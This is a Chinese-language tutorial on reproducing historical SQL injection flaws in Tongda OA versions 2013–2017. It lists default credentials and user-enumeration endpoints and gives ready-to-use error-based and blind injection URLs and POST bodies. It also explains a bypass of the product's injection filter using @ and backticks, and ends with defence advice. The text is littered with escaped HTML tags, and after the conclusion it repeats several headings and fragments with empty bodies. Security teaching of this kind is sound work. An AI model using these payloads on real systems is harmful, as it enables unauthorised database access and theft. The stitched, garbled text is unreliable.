通达OA历史漏洞复现与分析教学文档<\/h1>

一、通达OA简介<\/h2>
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。<\/p>

环境搭建<\/h3>

安装包下载地址<\/strong>：<\/p>

官方下载（通过枚举版本号）：<\/p>

https:\/\/cdndown.tongda2000.com\/oa\/2019\/TDOA11.4.exe<\/li>
https:\/\/www.tongda2000.com\/download\/down.php?VERSION=2019&code=<\/li> <\/ul> <\/li>

百度网盘下载：<\/p>

链接: https:\/\/pan.baidu.com\/s\/16Ie3yegEjdb--jabA0Zsxg<\/li>
提取码: 4g6i<\/li> <\/ul> <\/li> <\/ol>
默认账号密码<\/strong>：admin\/(空)<\/p>
代码解密工具<\/strong>：http:\/\/dezend.qiling.org\/free\/<\/p>
二、信息收集<\/h2>
1. 版本信息<\/h3>

\/inc\/expired.php<\/li>
\/inc\/reg_trial.php<\/li>
\/inc\/reg_trial_submit.php<\/li> <\/ul>
2. 计算机名（需高于2013版本）<\/h3>

\/resque\/worker.php<\/li> <\/ul>
3. 用户名&邮箱枚举（需高于2013版本）<\/h3>

\/ispirit\/retrieve_pwd.php?username=要枚举的用户

存在的用户<\/li>
不存在的用户<\/li> <\/ul> <\/li> <\/ul>
三、通达OA2013漏洞分析<\/h2>
1. \/interface\/ugo.php 报错注入<\/h3>
漏洞复现<\/strong>：<\/p>
\/interface\/ugo.php?OA_USER=a%2527%20and%201=(select%201%20from(select%20count(*),concat((select%20database()),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271 <\/code><\/pre> 漏洞分析<\/strong>：<\/p> 定位到\/interface\/ugo.php，使用函数urldecode解析$OA_USER<\/li> 调用ext_login_check方法处理$OA_USER<\/li> ext_login_check方法直接拼接并调用exequery执行SQL<\/li> exequery方法在inc\/conn.php文件中定义<\/li> 过滤了union select、info outfile和into dumpfile<\/li> <\/ol> 2. \/interface\/auth.php 报错注入<\/h3> 漏洞复现<\/strong>：<\/p> \/interface\/auth.php?&PASSWORD=1&USER_ID=%df%27 and (select 1 from (select count(*),concat((select concat(0x3a,(select database()),0x3a) from user limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 <\/code><\/pre> 漏洞分析<\/strong>：<\/p> 定位到\/interface\/auth.php<\/li> 对USER_ID进行了字符替换过滤（单引号等）<\/li> 直接拼接USER_ID到SQL语句中执行<\/li> <\/ol> 3. \/interface\/go.php 报错注入<\/h3> 漏洞复现<\/strong>：<\/p> \/interface\/go.php?APP_UNIT=a%2527 and 1=(select 1 from (select count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and %25271%2527=%25271 <\/code><\/pre> 漏洞分析<\/strong>：<\/p> 定位到\/interface\/go.php<\/li> 对OA_USER和APP_UNIT进行了字符替换过滤<\/li> 直接拼接APP_UNIT到SQL语句中执行<\/li> OA_USER参数同样存在注入风险<\/li> <\/ol> 四、通达OA2015漏洞分析<\/h2> \/ispirit\/retrieve_pwd.php 盲注<\/h3> 漏洞复现<\/strong>：<\/p> 判断是否存在注入： \/ispirit\/retrieve_pwd.php?_GET[username]=admin'or 1=1 and'a'='a <\/code><\/pre> <\/li> 判断数据库长度为5： \/ispirit\/retrieve_pwd.php?_GET[username]=admin' or if((length(database())=5),1,power(88888,88)) and'a'='a <\/code><\/pre> <\/li> 判断数据库是否为td_oa： \/ispirit\/retrieve_pwd.php?_GET[username]=admin'or if((database()='td_oa'),1,power(888888,88))and'a'='a <\/code><\/pre> <\/li> <\/ol> 漏洞分析<\/strong>：<\/p> 定位到\/ispirit\/retrieve_pwd.php<\/li> 直接拼接username到SQL语句中<\/li> 调用exequery方法执行<\/li> exequery调用db_query方法，其中包含sql_injection检测<\/li> sql_injection方法进行了黑名单校验（union、sleep、benchmark等）<\/li> <\/ol> 五、通达OA2017漏洞分析<\/h2> \/general\/document\/index.php\/setting\/keywords\/index 布尔盲注<\/h3> 漏洞复现<\/strong>： POST数据包：<\/p> _SERVER[QUERY_STRING]=kname=1'+and@`'`+or+if(substr(user(),1,1)='r',1,exp(710))# <\/code><\/pre> 漏洞分析<\/strong>：<\/p> 定位到general\/document\/index.php<\/li> 框架结构：controllers\/文件\/方法<\/li> 具体路径：\webroot\general\document\controllers\setting\keywords.php的index方法<\/li> 调用_get_where方法处理参数<\/li> _get_where方法使用parse_str解析$_SERVER['QUERY_STRING']<\/li> 直接拼接kname和category到SQL语句中<\/li> 调用mkeyword的get_keywords_count方法执行SQL<\/li> <\/ol> 关键绕过技术<\/strong>：<\/p> 使用@<\/code>和反引号`<\/code>绕过过滤 @<\/code>表示设置一个变量<\/li> 反引号是转义符<\/li> <\/ul> <\/li> 绕过原理： sql_injection方法将单引号内的内容替换为$s$<\/span><\/li> 通过@<\/code>和反引号使后面的语句不被检测<\/li> <\/ul> <\/li> 完整SQL语句： select<\/span> count<\/span>(*<\/span>) as<\/span> total from<\/span> doc_keywords where<\/span> 1<\/span>=<\/span>1<\/span> and<\/span> category=<\/span>'1'<\/span> and<\/span>@`<\/span>'` or if(substr(user(),1,4)='<\/span>root',1,exp(710))#'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> category参数同样存在注入<\/strong>：<\/p> _SERVER%5BQUERY_STRING%5D=category%3D1%27%2Band%40%60%27%60%2Bor%2Bif%28substr%28user%28%29%2C1%2C4%29%3D%27root%27%2C1%2Cexp%28710%29%29%23 <\/code><\/pre> MySQL监控工具<\/strong>：<\/p> https:\/\/github.com\/jdr2021\/MysqlLogQuery<\/li> <\/ul> 六、总结<\/h2> 通达OA多个版本存在SQL注入漏洞<\/li> 注入点主要出现在参数直接拼接SQL语句的地方<\/li> 2017版本的绕过技术尤为精妙，利用@<\/code>和反引号组合绕过过滤<\/li> 漏洞挖掘思路：查找参数直接拼接SQL的地方<\/li> 分析过滤机制，寻找绕过方法<\/li> 尝试不同参数和位置<\/li> <\/ul> <\/li> <\/ol> 七、防御建议<\/h2> 使用参数化查询或预处理语句<\/li> 对用户输入进行严格的过滤和转义<\/li> 最小化数据库用户权限<\/li> 及时更新到最新版本，修复已知漏洞<\/li> <\/ol>

通达OA历史漏洞复现与分析教学文档<\/h1>

一、通达OA简介<\/h2> 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。<\/p>

三、通达OA2013漏洞分析<\/h2>

四、通达OA2015漏洞分析<\/h2>

五、通达OA2017漏洞分析<\/h2>

七、防御建议<\/h2> 使用参数化查询或预处理语句<\/li> 对用户输入进行严格的过滤和转义<\/li> 最小化数据库用户权限<\/li> 及时更新到最新版本，修复已知漏洞<\/li> <\/ol>

一、通达OA简介<\/h2>
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。<\/p>

七、防御建议<\/h2>

使用参数化查询或预处理语句<\/li>
对用户输入进行严格的过滤和转义<\/li>
最小化数据库用户权限<\/li>
及时更新到最新版本，修复已知漏洞<\/li> <\/ol>